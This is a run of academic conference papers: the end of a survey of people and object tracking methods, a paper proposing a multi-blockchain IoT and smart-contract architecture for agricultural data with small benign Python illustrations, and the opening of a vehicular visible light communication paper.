Some of the analyzed approaches use artificial intelligence models [4,5,11]. In [4], the authors dynamically launch a subnet for each person instance to predict the next location and use the intersection over union and the detection confidence in the computation of association costs. This approach remains open to improvement: the basic subnet of the MBN network could be strengthened to improve the robustness and discrimination of its extracted features; the approach could better manage small objects by tailoring the feature extraction process to different object sizes; a more efficient model should be designed for the instance sub-networks; and, finally, more efficient terms for composing the elements of the association matrix should be studied, together with new data association algorithms. In addition, the authors of the paper intend to extend their work to incorporate full category detection and form a unified framework. With the powerful representation-learning ability of deep CNN models, these methods generally address the problem of scale variation by using multi-column architectures to improve feature learning, where the input is processed with convolutional kernels of different sizes in each column to extract features at different scales. However, they suffer from certain problems. First, a large scale variation cannot be covered by a limited number of columns, and blindly increasing the number of columns results in a massive parameter overhead, which easily fails at diverse scales. Second, these networks usually generate a low-resolution crowd density map while learning increasingly abstract features.

Table 1. Comparison of the studied approaches.


Table 2. Detailed comparison of the studied approaches through a classification of approaches.



Therefore, they still suffer from a serious degradation of precision when applied in difficult crowd scenes with large scale variation or high congestion.

The authors of [5] present a study of the viability of machine learning techniques applied to GPS data to predict possible pathways of people with dementia (Alzheimer's disease, AD). They use a combination of unsupervised and supervised models to learn the routines of individuals [9]: an unsupervised model determines where an individual spends the majority of their time, and a supervised model then predicts the location of individuals based on the day of the week and the time of day. The authors reach an average ROC area (AUC) of 0.778 with an accuracy of 0.631 and a precision of 0.662. Their approach considered only spatio-temporal data and did not address the detection of abnormal behavior. The authors suggest that predictive models can be produced for each individual, depending on how often the individual wears the device, so that GPS data is collected. The main drawbacks of this work are that the GPS quickly drains the battery of the IoT device, that the data is not limited to patients with AD, and that, in fact, there is no information about the carriers of the device.

Using an IoT system to handle COVID-19 [8] has also begun to be widely explored, in the areas of health, tracking, prevention, and several other applications. The system shows good results on indicators applied to reality: it follows the trajectories of infected people a few days before the appearance of their symptoms, identifies people who were in close contact with infected patients, and identifies black areas which may be the main sources of viral spread. The proposed system can be configured to find all uninfected people who have visited places already visited by infected people, to determine whether citizens respect social distancing, and to check whether people suspected of being infected comply with the imposed confinement; it can also help reduce the economic damage caused by the suspension of all activities. The proposed solution can be used for any potential outbreak that could be more powerful and have a higher rate of spread. Finally, the system can be equipped with additional features such as machine learning or deep learning capabilities. One point to improve in this approach is that it cannot determine the trajectory of infected persons who were not encountered along the way, nor handle persons who do not respect the instructions and precautionary measures.

Among the analyzed approaches, some address the problem using technological tools as the main actors [6,7]. The work in [6] conducted an analysis of purchasing behavior based on computer vision technology and the density of customers in the store. Different algorithms were used to track people in the video recordings; in this context, the appearances of pedestrians were classified into front and back postures, and the detected individuals were segmented into several parts such as the head and torso. However, part-based tracking algorithms can hardly overcome the challenge of a target that is fully occluded or absent for a long time. This work could be improved by adding the new behavioral analysis solutions based on artificial vision that are emerging, such as eye tracking and gesture recognition.


Another improvement would be to focus on the use of the association module in the tracking system, which prevents identity changes caused by severe occlusions and interactions between followed customers in crowded stores. The work in [7] proposed a real-time tracking and surveillance architecture for logistics and transport in RoRo (Roll-On/Roll-Off) terminals. The system aims to manage dynamic logistics processes and optimize certain cost functions such as traffic flow and recording time. The specific mission of the system is the identification, monitoring, and tracking of rolling freight. Among the strengths of the solution proposed in [7] are the capture of data in a few seconds, the reduction of recording time, the increase of traffic flow, the use of inexpensive technological tools such as barcodes or QR codes, and the adoption of scannable identity cards, which do not require the presence of a person to perform the scanning operation. This work still needs to be tested in reality, via an evaluation using a real case study with data from a port, for example.

Among other means is the use of graphs: some models dedicated to tracking people are inspired by graph theory. In [10], the points of a human skeleton are computed using a silhouette model. Instead of computing the 3D position of the skeleton points, a topology of the structure of the human body is used for limb labeling. The proposed method can handle different views of a person, such as front, back, and profile. It also provides appropriate labeling of limbs for unspecified human postures. However, it only uses the topology of the corresponding graph to label the different parts of the body, which makes it difficult to manage situations where the arms merge with the torso.

By analyzing the proposals of each article, we observe that no approach can be adapted to human beings as well as to objects: for example, [4,5,8-11] address the sub-level of tracking for human beings, whereas [6,7] address the sub-level of tracking for objects. Our team sides with the researchers who argue that we must find an approach that combines all the technologies used in the articles [4-11] in order to obtain a high-performance and general approach, that is, a solution adaptable to all the granularities of Fig. 1. Table 1 details the approaches proposed in the articles, the problem addressed and the proposed solution, and assesses the type of methodology followed in each approach [4-11]. In contrast, Table 2 provides a classification of the approaches [4-11] according to Fig. 2. Approaches are generally based on a case study, but they can also use a practical case, as shown in [4-6,8-10]; the approach in [7] is based only on a case study, whereas [11] is based only on a practical case. This study will therefore facilitate the choice of the model to use in tracking. Moreover, even considering all the approaches mentioned in this article, and although the tracking theme has strongly imposed itself in recent times, few general methods have emerged so far at the tracking level, and all the tracking approaches proposed to date remain limited and not generalized. Of course, there may be other approaches that are not mentioned in this study.


Finally, to close our analysis and discussion of the different approaches studied, we list the main granularities of a tracking approach based on the articles studied:

– Tracking for people or objects.
– Tracking in limited or unlimited space.
– Tracking in real or unreal time.
– Tracking using technology tools, IoT, graphs, Big Data, and artificial intelligence.

5 Conclusion and Future Work

This article deals with the topic of tracking in its entirety, analyzing and discussing different approaches and shedding more light on the latest ones. So far, only a few approaches have been proposed, and most of them are not complete. Our research team aims at a tracking system that tracks its target on an ongoing basis, given the sensitivity and required accuracy of the subject in certain areas such as terrorism, epidemics, and criminal cases such as kidnapping. In our future work, we will complement the approach under consideration, proposing new comprehensive approaches, covering all potential cases, and focusing on the different parts that have not yet been addressed.

References
1. Leal-Taixé, L., Milan, A., Schindler, K., Cremers, D., Reid, I., Roth, S.: Tracking the trackers: an analysis of the state of the art in multiple object tracking. arXiv preprint arXiv:1704.02781 (2017)
2. He, F., Deng, Y., Li, W.: Coronavirus disease 2019: what we know? J. Med. Virol. 92(7), 719–725 (2020)
3. Headey, D.D., Ruel, M.T., et al.: The COVID-19 nutrition crisis: what to expect and how to protect. In: IFPRI Book Chapters, pp. 38–41. International Food Policy Research Institute (IFPRI) (2020)
4. Wu, H., Hu, Y., Wang, K., Li, H., Nie, L., Cheng, H.: Instance-aware representation learning and association for online multi-person tracking. Pattern Recogn. 94, 25–34 (2019)
5. Wojtusiak, J., Nia, R.M.: Location prediction using GPS trackers: can machine learning help locate the missing people with dementia? Internet Things, 100035 (2019)
6. Merad, D., Aziz, K.-E., Iguernaissi, R., Fertil, B., Drap, P.: Tracking multiple persons under partial and global occlusions: application to customers' behavior analysis. Pattern Recogn. Lett. 81, 11–20 (2016)
7. M'hand, M.A., Boulmakoul, A., Badir, H., Lbath, A.: A scalable real-time tracking and monitoring architecture for logistics and transport in RoRo terminals. Procedia Comput. Sci. 151, 218–225 (2019)


8. Benreguia, B., Moumen, H., Merzoug, M.A.: Tracking COVID-19 by tracking infectious trajectories. IEEE Access 8, 145242–145255 (2020)
9. Ruiz-del-Solar, J., Shats, A., Verschae, R.: Real-time tracking of multiple persons. In: 12th International Conference on Image Analysis and Processing, Proceedings, pp. 109–114. IEEE (2003)
10. Thome, N., Merad, D., Miguet, S.: Human body part labeling and tracking using graph matching theory. In: 2006 IEEE International Conference on Video and Signal Based Surveillance, pp. 38–38. IEEE (2006)
11. Menni, C., et al.: Real-time tracking of self-reported symptoms to predict potential COVID-19. Nat. Med. 26(7), 1037–1040 (2020)
12. Bollobás, B.: Modern Graph Theory, p. 184. Springer, Heidelberg (2013). https://doi.org/10.1007/978-1-4612-0619-4
13. Bondy, J.A., Murty, U.S.R.: Théorie des graphes. Springer, Heidelberg (2008)
14. Buyya, R., Dastjerdi, A.V.: Internet of Things: Principles and Paradigms. Elsevier, Amsterdam (2016)
15. Russell, S., Norvig, P.: Artificial Intelligence: A Modern Approach. Prentice Hall, Upper Saddle River (2002)
16. Furht, B., Villanustre, F.: Big Data Technologies and Applications. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-44550-2
17. Al Rahhal, M.M., Bazi, Y., Abdullah, T., Mekhalfi, M.L., AlHichri, H., Zuair, M.: Learning a multi-branch neural network from multiple sources for knowledge adaptation in remote sensing imagery. Remote Sens. 10(12), 1890 (2018)
18. Han, M., Sethi, A., Hua, W., Gong, Y.: A detection-based multiple object tracking method. In: 2004 International Conference on Image Processing, ICIP 2004, vol. 5, pp. 3065–3068. IEEE (2004)
19. Berry, M.W., Mohamed, A., Yap, B.W. (eds.): Supervised and Unsupervised Learning for Data Science. USL, Springer, Cham (2020). https://doi.org/10.1007/978-3-030-22475-2
20. Goodfellow, I., Bengio, Y., Courville, A.: Deep Learning, vol. 1, 2nd edn. MIT Press, Cambridge (2016)
21. McKenna, S.J., Jabri, S., Duric, Z., Rosenfeld, A., Wechsler, H.: Tracking groups of people. Comput. Vision Image Underst. 80(1), 42–56 (2000)
22. Lee, H.C., Luong, D.T., Cho, C.W., Lee, E.C., Park, K.R.: Gaze tracking system at a distance for controlling IPTV. IEEE Trans. Cons. Electron. 56(4), 2577–2583 (2010)
23. Celebi, M.E., Aydin, K. (eds.): Unsupervised Learning Algorithms. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-24211-8
24. Huo, F., Hendriks, E.A.: Multiple people tracking and pose estimation with occlusion estimation. Comput. Vision Image Underst. 116(5), 634–647 (2012)
25. Wengefeld, T., Lewandowski, B., Seichter, D., Pfennig, L., Müller, S., Gross, H.M.: Real-time person orientation estimation and tracking using colored point clouds. Rob. Auton. Syst. 135, 103665 (2021)
26. Küçükkeçeci, C., Yazici, A.: Multilevel object tracking in wireless multimedia sensor networks for surveillance applications using graph-based big data. IEEE Access 7, 67818–67832 (2019)
27. Lukasczyk, J., Weber, G., Maciejewski, R., Garth, C., Leitte, H.: Nested tracking graphs. Comput. Graph. Forum 36(3), 12–22 (2017)
28. Xiao, C., et al.: A new deep learning method for displacement tracking from ultrasound RF signals of vascular walls. Comput. Med. Imaging Graph. 87, 101819 (2021)


29. Widanagamaachchi, W., Christensen, C., Pascucci, V., Bremer, P.-T.: Interactive exploration of large-scale time-varying data using dynamic tracking graphs. In: IEEE Symposium on Large Data Analysis and Visualization (LDAV), pp. 9–17. IEEE (2012)
30. Meijering, E., Dzyubachyk, O., Smal, I.: Methods for cell and particle tracking. Methods Enzymol. 504, 183–200 (2012)
31. Karimov, K.S., Saqib, M.A., Akhter, P., Ahmed, M.M., Chattha, J.A., Yousafzai, S.A.: A simple photo-voltaic tracking system. Solar Energy Mater. Solar Cells 87(1–4), 49–59 (2005)
32. Yilmaz, A., Javed, O., Shah, M.: Object tracking: a survey. ACM Comput. Surv. (CSUR) 38(4), 13-ES (2006)
33. Walter, T., Couzin, I.D.: TRex, a fast multi-animal tracking system with markerless identification, and 2D estimation of posture and visual fields. Elife 10, e64000 (2021)
34. Tryggvason, G., et al.: A front-tracking method for the computations of multiphase flow. J. Comput. Phys. 169(2), 708–759 (2001)
35. Metcalf, C.E., Kemper, P., Kohn, L.T., Pickreign, J.D.: Site definition and sample design for the Community Tracking Study. Center for Studying Health System Change, Washington, DC (1996)
36. Peng, J., et al.: TPM: multiple object tracking with tracklet-plane matching. Pattern Recogn. 107, 107480 (2020)
37. Chenouard, N., et al.: Objective comparison of particle tracking methods. Nat. Methods 11(3), 281–289 (2014)
38. Scopus preview - Scopus - Welcome to Scopus. https://www.scopus.com/. Accessed 27 June 2021
39. Liu, Q., et al.: Online multi-object tracking with unsupervised re-identification learning and occlusion estimation. Neurocomputing 483, 333–347 (2022)

Multi-blockchain Scheme Based on IoT and Smart Contracts in the Agricultural Field for Data Management

Adil El Mane1(B), Redouan Korchiyne1, Omar Bencharef2, and Younes Chihab1

1 Computer Research Laboratory, Superior School of Technology, Ibn Tufail University, 14000 Kenitra, Morocco
[email protected]
2 IT Department, FST Gueliz, Cadi Ayyad University, 40000 Marrakech, Morocco

Abstract. The Blockchain represents data that is both structured and shared. In essence, it is a current approach to handling distributed databases by a group of participants. The purpose is to collect data, construct a digital ledger, and distribute it to each participant using P2P techniques. Blockchain technology is employed in various industries, including government, transport, commerce, and healthcare. This paper focuses on the use of Blockchain in the agricultural supply chain, particularly the multi-Blockchain strategy for increasing performance and yield tracking. This type of architecture requires the presence of at least two chains in one system. This study presents a new theoretical architecture based on past investigations; the article examines how to adapt the approach and lists the phases involved. The new framework aims to eliminate the mistakes that have plagued past studies. First, sensors supply us with the recorded data sets. We then store our data in blocks using the multi-Blockchain structure. Then, to control all transactions and make choices based on the criteria in the source code of these automated contracts, we create Smart Contracts. This technique should be more effective than cloud applications or simply storing data on a single Blockchain.

Keywords: Multi-blockchain system · agriculture · IoT · information hash

1 Introduction

Blockchain belongs to the Parallel and Distributed Computing Architecture (PDCA) family of computing platforms. It relies on a set of nodes managed and controlled by an administrator. Its goals are to save expenses, eliminate third parties, and boost efficiency and quality [1]. There are three sorts of Blockchains: public, private, and permissioned.


The Blockchain is a peer-to-peer (P2P) network that manages data flow without a centralized system. It is a decentralized database that confirms the data's integrity, so all linked computers receive the latest version of the information. Once the nodes have verified and validated a transaction, it is approved and added to a block. One of the main reasons consumers adopt Blockchains is that they do not want a third party (banking corporations, financial companies, etc.) interfering in the communication between two nodes. At the same time, Blockchains provide a trustworthy system, and they enforce the rules using consensus algorithms.

Smart Contracts are operated on Blockchains. Smart contracts are programming codes built as sophisticated if-then expressions. Using algorithms that examine the supplied data, a smart contract can verify by itself whether its conditions are satisfied and then self-execute a decision. Blockchains have adopted Smart Contracts because they are autonomous elements that can perform tasks without a third party's intervention [2].

Every invention is the outcome of a problem-solving endeavor, and blockchain technology is no different. Looking at its history, it is clear that it evolved to address a vulnerability in traditional centralized systems, a vulnerability that could never be eradicated but only reduced. There have always been organizations that acted as third-party legislators to compensate for the lack of confidence whenever parties needed to reach an agreement: one party expects to receive fair products, while the other expects to receive the agreed-upon funds. Although the buyer and seller have no reason to trust each other, they complete their transaction because they have faith in the third party. Blockchain promised to solve these problems by allowing applications to be implemented in a decentralized and secure manner, providing some level of assurance; in a trustless society, this was one of the critical reasons for Blockchain's broad popularity. The Blockchain, however, is not solely responsible for this success: a few more protocols help it become the resilient and robust technology that it is. The decentralization of processing, P2P networks, and the maintenance of a secure and publicly distributed ledger that provides total transparency over the whole chain enable Blockchain to be applied in trustless networks.

Blockchain is used by community organizations, libraries, and some agricultural enterprises because transactions are securely recorded, and this technology lowers the barrier to building peer-to-peer networks. Smart contracts, the Internet of Things, supply chain management, storing farm data, and identity management are all possible applications of blockchain technology. The most compelling reason to adopt Blockchain and IoT together is to improve security by safeguarding essential and valuable data. The decentralized architecture will revolutionize how essential information is handled by producing a record that cannot be changed and is encrypted end-to-end. Personal data is anonymized on the Blockchain, and permissions restrict access.


Instead of a single server, information is kept over a network of computers (a distributed ledger), making it impossible for hackers to access it. Blockchain can instantly track commodities or products by establishing a journey audit log; this aids in providing proof and exposing flaws in any supply chain. Additionally, smart contracts on the Blockchain will automate transactions, increasing efficiency and speeding up the process. Smart contracts eliminate the need for human involvement and the dependency on third parties to ensure that contract requirements are followed.
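To illustrate the "sophisticated if-then expression" view of a smart contract described above, here is a minimal, purely illustrative sketch in Python (not Solidity or any real contract language): the condition names, the oracle data and the release action are hypothetical placeholders.

```python
# Sketch: a smart contract as a self-executing if-then rule (illustrative).
# Real smart contracts run on a blockchain VM; this only mirrors the logic.
from dataclasses import dataclass

@dataclass
class DeliveryContract:
    buyer: str
    seller: str
    price: int          # agreed amount, in some token unit
    settled: bool = False

    def execute(self, oracle_data: dict) -> str:
        """Self-verify the condition and self-execute the decision."""
        if self.settled:
            return "already settled"
        # Condition encoded in the contract: goods confirmed as delivered.
        if oracle_data.get("delivery_confirmed") is True:
            self.settled = True
            return f"release {self.price} tokens from {self.buyer} to {self.seller}"
        return "condition not met: funds stay in escrow"

if __name__ == "__main__":
    contract = DeliveryContract(buyer="farmer-coop", seller="equipment-vendor", price=100)
    print(contract.execute({"delivery_confirmed": False}))
    print(contract.execute({"delivery_confirmed": True}))
```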

2 Previous Work

According to the study "A double-Blockchain solution for agricultural sampled data security in Internet of Things network" [3], certain malicious entities might tamper with the devices and alter the gathered data; hackers, producers of bogus data, and malfunctioning tools are examples of such entities. For example, a tampered sensor in a healthcare IoT application might report faulty heart rate measurements, which may in turn result in prescription mistakes. Likewise, in agricultural applications, such issues can lead to the exposure of production secrets and to crop disasters due to ineffective control strategies; tampered data also leads to inaccurate watering times and quantities.

Public chains like Ethereum and Hyperledger are the core of current Blockchain solutions. Consortium chains address some of the public chains' shortcomings, but data privacy may become an issue. Unfortunately, public networks like Ethereum may lack the ability to send and receive data in real time, and they do not offer absolute decentralization. Blending these technologies results in a double-chain solution. Two Blockchains make up the system's architecture: Ethereum is a public Blockchain that provides users with features such as Smart Contracts, and the Polkadot inter-Blockchain also secures the system; in addition, Polkadot reduces data redundancy by facilitating data exchanges between chains.

The system is divided into three levels, each corresponding to a different data processing phase. IPFS is the first layer: the hash of the IPFS content is formed in parallel while the sampled data is placed directly in the IPFS network. Then, the IPFS hash data is uploaded to the second-layer chain, named ASDC. Multiple IPFS hash values are kept in each block of the ASDC chain, and every block includes a hash value computed for the ASDC chain. Only IPFS hash values, not files, are saved in a block at this stage; as a result, the ASDC chain processes significantly less data and is easier to maintain.

Many solutions can handle agricultural tasks, but each has a flaw. Using a cloud file storage system, for example, can be beneficial for data transmission but detrimental to data security. The Ethereum Blockchain offers a secure and tamper-proof ecosystem, but it is slow to upload and download data. The consortium chain offers a medium degree of security: although the transmission speed is adequate, the protection is lacking.
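A minimal sketch of the "store only the content hash on-chain" idea is shown below: raw sensor records are kept off-chain (in the paper, on IPFS), while a lightweight chain of blocks stores only their hashes. The block structure, field names and use of SHA-256 are our illustrative assumptions, not the exact format of the ASDC chain.

```python
# Sketch: keeping only content hashes on a lightweight chain (illustrative).
import hashlib
import json
import time

def content_hash(record: dict) -> str:
    """Stand-in for an IPFS content identifier: SHA-256 of the record."""
    return hashlib.sha256(json.dumps(record, sort_keys=True).encode()).hexdigest()

def make_block(prev_block_hash: str, record_hashes: list[str]) -> dict:
    block = {"prev": prev_block_hash, "time": time.time(), "hashes": record_hashes}
    block["block_hash"] = hashlib.sha256(json.dumps(block, sort_keys=True).encode()).hexdigest()
    return block

if __name__ == "__main__":
    samples = [{"sensor": "soil-7", "moisture": 0.31}, {"sensor": "soil-7", "moisture": 0.29}]
    hashes = [content_hash(s) for s in samples]          # data itself stays off-chain
    genesis = make_block("0" * 64, [])
    block1 = make_block(genesis["block_hash"], hashes)   # chain stores hashes only
    print(block1["block_hash"])
```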


Combining Ethereum with a consortium chain therefore gives an appealing way to build a tamper-resistant and largely secure scheme: transfer speed remains moderate, but all recorded data is safeguarded. The remaining security risk of this system is the alteration of the data hash, and as the agricultural IoT network grows, more and more devices will join the scheme and put pressure on the Blockchain network. The article "Research on agricultural supply chain system with double chain architecture based on Blockchain technology" [4] proposes a public double-Blockchain for modern agriculture administration. The Blockchain provides the necessary security and improves the efficiency of agribusiness processes. Because a public Blockchain cannot protect corporate information, the paper proposes an agricultural Blockchain paradigm built on a User Information Blockchain and a Transaction Blockchain: the former keeps track of user details, while the latter records and traces all transaction data. This double-chain model benefits the public agriculture sector; a node can use the tools of the service network without learning a company's confidential information, which guarantees, at a technical level, both the openness of transaction data and the protection of user information. A Merkle tree structure preserves the secrecy of the participants' personal information stored in the User Information Chain, while the Transaction Blockchain ensures the transparency of the transaction process; a Merkle Patricia tree is then used to record and handle transaction data, whose key-value pairs can be easily searched and traced. A few issues in this project deserve deeper study: many resources on the public service network require upgrades across several technologies, and the Proof-of-Stake mechanism needs improvements in performance and power consumption. Blockchain, IoT, and other emerging technologies can achieve a high level of resource integration and assess the long-term viability of the participants' performance. They can capture many factors, such as crop growth, and help upstream farmers increase productivity and revenue; helping farmers deploy IoT devices with additional computing power may also allow processing businesses to acquire more tokens. Likewise, IoT data and public data analysis determine an enterprise's long-term viability, and green production in general can implement and exploit Smart Contracts. The architecture has a double-chain structure: the scheme below shows a main-chain and a sub-chain that realize the vision above and its functionalities (see Fig. 1). The Mainchain forms the communication network between companies, farmers, government, and financial providers and stores account information, transaction data, and social life-cycle assessment data.


The Subchain primarily holds data acquired by IoT devices, such as agricultural information, product shipping information, and data on the environmental implications of agricultural goods. Farmers and businesses upload most of this content, while the government, customers, and financial organizations, as stakeholders, can always monitor a portion of the information [5].

Fig. 1. Double-Blockchain structure based on data management, IoT, and government reports.

The article "Hierarchical Multi-Blockchain Architecture for Scalable Internet of Things Environment" [6] addresses a setting in which the distribution, storage, and analysis of IoT data still rely on a centralized Internet Service Provider (ISP) or cloud service. In the proposed design, a Blockchain network acts as a backbone that handles as many transactions as feasible, most likely using a BFT-variant consensus; this backbone network is small in size but large in capacity. Underneath it, numerous low-throughput sub-Blockchains serve the many IoT devices. Spreading transactions across the sub-Blockchains relieves the load on the primary network and improves the overall capacity of the system. Sub-Blockchain parallelism is also possible, so that many replicas of a sub-Blockchain operate on numerous IoT activities simultaneously. Having many sub-Blockchain instances reduces the data ledger held by the sub-nodes; consequently, a given device is more likely to be able to join a chain, and the minimum storage requirement for becoming a Blockchain node in a sub-Blockchain is reduced.
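The transaction-spreading idea can be pictured with a small Python sketch. The assignment rule below (hashing a device identifier modulo the number of sub-chains) is our own illustrative choice, not the mechanism of [6]; it only shows how distributing devices over several sub-ledgers shrinks the ledger each sub-node must hold.

```python
import hashlib
from collections import defaultdict

NUM_SUBCHAINS = 4  # assumed number of sub-Blockchain instances

def subchain_for(device_id: str) -> int:
    # Deterministically map a device to one sub-chain.
    digest = hashlib.sha256(device_id.encode("utf-8")).hexdigest()
    return int(digest, 16) % NUM_SUBCHAINS

# Simulate 1,000 IoT devices each submitting one transaction.
sub_ledgers = defaultdict(list)
for n in range(1000):
    device = f"sensor-{n:04d}"
    tx = {"device": device, "reading": 20.0 + (n % 10)}
    sub_ledgers[subchain_for(device)].append(tx)

# Each sub-node now stores roughly 1/NUM_SUBCHAINS of the transactions,
# while the backbone chain would only anchor the sub-chains' summaries.
for chain_id, txs in sorted(sub_ledgers.items()):
    print(f"sub-chain {chain_id}: {len(txs)} transactions")
```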


Notarization nodes help administer all machines distributed throughout the system. All Notary nodes are responsible for governing the Core Engine; they are also accountable for the sub-engines, which coordinate with Agent nodes (sub-nodes). An Agent node can be an IoT server, user, gateway, or device. On top of the available Notary nodes, developers run their IoT applications in a distributed manner, and the Notary nodes expose all sub-engine functions to these applications through Application Programming Interfaces (APIs). The article "KRanTi: Blockchain-based Farmer's Credit Scheme for Agriculture-Food Supply Chain" [7] describes a core system that connects producers, farmers, distributors, retailers, and consumers. KRanTi's architecture consists of a physical layer, a BC layer, and an IPFS layer. As the figure below shows, the physical layer reflects the physical interactions among the stakeholders; the BC layer provides a variety of Ethereum-based functions for safe and transparent data transmission together with a BC-based credit facility; and the IPFS layer keeps the bulky data off-chain at low cost and with optimal bandwidth usage (see Fig. 2). The KRanTi framework first enrolls all stakeholders: upon registration, the legal documents are sent to the authority council, where the stakeholder is confirmed, and the details are saved in IPFS. During crop selection, farmers choose the seed business and seed type, and the request, with product id and quantity, is forwarded to the providers. Once all orders have been delivered to the farmer, a license key attesting to quality is issued. For a successful order, the cost is computed and compared with the granted credits, and this credit payment is made automatically within the crop production line. After harvest, the crops are sorted and packed, and a unique sequential product id is generated and encoded into a QR code. They are then sold to distributors, who hold large harvests in warehouses; retailers purchase the crops from the distributors and sell them to end-users, who finally buy them from nearby merchants. When a consumer gives a product a recommendation score, the score is added to the farm's quality-assurance score.

3 The Proposed Architecture

All of the preceding concepts inspired the proposed theoretical architecture, which is a multi-Blockchain design. As the figure below shows, the first layer is the Internet of Things (IoT); it includes all of the essential sensors and IoT hardware, where each sensor converts a physical quantity into an electrical one (see Fig. 3). An Arduino board connects to humidity, temperature, pressure, acceleration, and other sensors, and Bluetooth or wireless links serve as the communication channels [8].


Fig. 2. Multi-Blockchain structure based on the physical layer, on-chain, and off-chain data solution.

The first layer supplies reliable environmental data: the Arduino features provide the acquired measurements, which are then used by the subsequent layers. The Blockchain layer consists of three separate Blockchains (BCs). The first is the Agri-product information BC, which holds product information and statistics. The second is the user information BC, which contains all the information about the network's users. The last is the transaction information BC, which holds a wealth of data, including users' personal information, intermediary information, transportation, payments, farm business information, and transactions. The primary purpose of using three Blockchains is to reduce data redundancy, and relying on a consortium Blockchain also speeds up data uploads and downloads. Smart Contracts operate within this paradigm: a Smart Contract is a self-executing contract governed by the terms written into it, so these contracts ensure correct decisions, openness, and clear communication between parties. Automated contracts rely on the strongest data encryption currently available, and the parties agree to play by the rules of the compiled code, so that only the guaranteed outcomes can occur. We built this theoretical architecture to combine all the advantages of using sensors that deliver real-time, tamper-free data. Organizing the Blockchain system into crop details and participant details is also helpful, since it dispatches information to all network members simultaneously. The sub-layer above is the Smart Contracts layer, which contains all the source code needed to execute certain tasks without human interference; the contracts are auto-executed and complete the Blockchain's role. The first practical step consists of injecting these Smart Contracts into our Blockchain scheme. In this project, the Smart Contracts manage the storage, the financing, and the full traceability of the product. The whole system should then demonstrate effectiveness, raise productivity, and create trust between all members of the Agri supply chain.
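As a concrete illustration of the self-executing if-then logic described above, the short Python sketch below models a delivery-payment rule. It is our own simplified stand-in, written in Python rather than in a contract language such as Solidity, and the condition, credit amount, and state fields are assumptions for illustration only.

```python
from dataclasses import dataclass, field

@dataclass
class DeliveryContract:
    farmer: str
    supplier: str
    agreed_quantity: float          # quantity ordered, in kg
    credit_per_kg: float            # credit released per delivered kg
    paid: bool = field(default=False)

    def settle(self, delivered_quantity: float, quality_ok: bool) -> float:
        """Self-executing rule: pay only if the delivery meets the terms."""
        if self.paid:
            return 0.0
        if quality_ok and delivered_quantity >= self.agreed_quantity:
            self.paid = True
            payment = self.agreed_quantity * self.credit_per_kg
            print(f"release {payment:.2f} credits from {self.farmer} "
                  f"to {self.supplier}")
            return payment
        print("conditions not met: no payment released")
        return 0.0

contract = DeliveryContract("farm-01", "seed-co", 500.0, 0.12)
contract.settle(480.0, quality_ok=True)    # conditions not met
contract.settle(500.0, quality_ok=True)    # payment released once
```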

Fig. 3. Multi-Blockchain structure based on IoT and Smart Contract system.

4 Conclusion

We have surveyed prior studies on the application of multi-Blockchain architectures in the agriculture industry. The first outcome is an overview of the variety of these architectural systems, each with its own set of benefits. The second is that they motivated us to design a theoretical architecture based on several Blockchains. The model has two layers, one for IoT and another for Blockchains: adopting IoT increases trustworthiness, while the Blockchain layer improves data flexibility and access speed. Adding the benefits of Smart Contracts, the suggested design offers better possibilities for extending functionality and increased protection. Since this approach has strong application potential, the next goal is to put the model into practice and test its effectiveness.


Multi-Blockchain technology has found applications in different industries, such as health, smart buildings, economics, administration, and transportation. Agri-food traceability is a particularly critical issue, which is one reason why many small-scale Blockchain enterprises have sprung up around the globe. Still, there are two sides to everything: some people do not yet understand the notion of Blockchain, which impedes the technology's growth, and some businesses may not wish to share certain aspects of their manufacturing supply chain with their clients. A number of challenges and roadblocks therefore remain to be resolved.

References

1. Dursun, T., Üstündağ, B.B.: A novel framework for policy based on-chain governance of blockchain networks. Inf. Process. Manage. 58(4), 102556 (2021). https://doi.org/10.1016/j.ipm.2021.102556
2. Laurence, T.: Blockchain For Dummies. Part 1: Getting Started with Blockchain, 2nd edn. John Wiley and Sons, Hoboken (2017)
3. Ren, W., Wan, X., Gan, P.: A double-blockchain solution for agricultural sampled data security in Internet of Things network. Future Gener. Comput. Syst. 117, 453–461 (2021). https://doi.org/10.1016/j.future.2020.12.007
4. Leng, K., Bi, Y., Jing, L., Fu, H., Van Nieuwenhuyse, I.: Research on agricultural supply chain system with double chain architecture based on blockchain technology. Future Gener. Comput. Syst. 86, 641–649 (2018). https://doi.org/10.1016/j.future.2018.04.061
5. Song, L., Wang, X., Wei, P., Lu, Z., Wang, X., Merveille, N.: Blockchain-based flexible double-chain architecture and performance optimization for better sustainability in agriculture. Comput. Mater. Continua 68(1), 1429–1446 (2021). http://www.techscience.com/cmc/v68n1/41871
6. Oktian, Y.E., Lee, S.G., Lee, H.J.: Hierarchical multi-blockchain architecture for scalable internet of things environment. Electronics 9(6), 1050 (2020). https://www.mdpi.com/2079-9292/9/6/1050
7. Patel, N., Shukla, A., Tanwar, S., Singh, D.: KRanTi: blockchain-based farmer's credit scheme for agriculture-food supply chain. Trans. Emerg. Telecommun. Technol., 4286 (2021). https://doi.org/10.1002/ett.4286
8. El Mane, A., Chihab, M., Bencharef, O., Chihab, Y.: Architectural scheme of a multi-blockchain in the agricultural field. Environ. Energ. Earth Sci. Web Conf. 297, 4 (2021). https://doi.org/10.1051/e3sconf/202129701056

A Geometry-Based Analytical Model for Vehicular Visible Light Communication Channels Fatima Zahra Raissouni1,2(B) and Abdeljabbar Cherkaoui1 1 Laboratory of Innovative Technologies (LTI), National School of Applied Sciences,

Abdelmalek Essaâdi University, Tangier, Morocco [email protected], [email protected] 2 Department of Electronics, University of Alcalá, 28801 Alcalá de Henares, Madrid, Spain

Abstract. Visible light communication for intelligent transport systems is a promising solution for realizing high-speed wireless networks. While this technology has been widely studied for indoor environments, it is still at an early stage for outdoor environments, where the key challenges are mobility and weather conditions. The main goal of this paper is to evaluate the performance of vehicular visible light communication systems in the presence of interfering vehicles and weather conditions. First, we propose a geometrical model to perform the analysis. Then we study the impact on the vehicle-to-vehicle link of dynamic behavior in the presence of other surrounding vehicles and various weather conditions. The results are validated by simulation. Keywords: Vehicle to vehicle (V2V) · Visible light communication (VLC) · Outdoor channel model · Vehicular visible light communication (VVLC) · Channel modeling · ITS

1 Introduction

